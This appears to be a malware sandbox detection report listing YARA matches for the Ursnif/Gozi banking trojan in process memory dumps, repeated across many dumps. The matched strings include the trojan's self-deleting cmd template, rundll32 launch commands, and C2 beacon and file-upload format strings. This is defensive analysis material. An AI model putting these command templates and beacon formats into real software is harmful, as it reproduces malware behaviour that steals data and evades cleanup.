00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
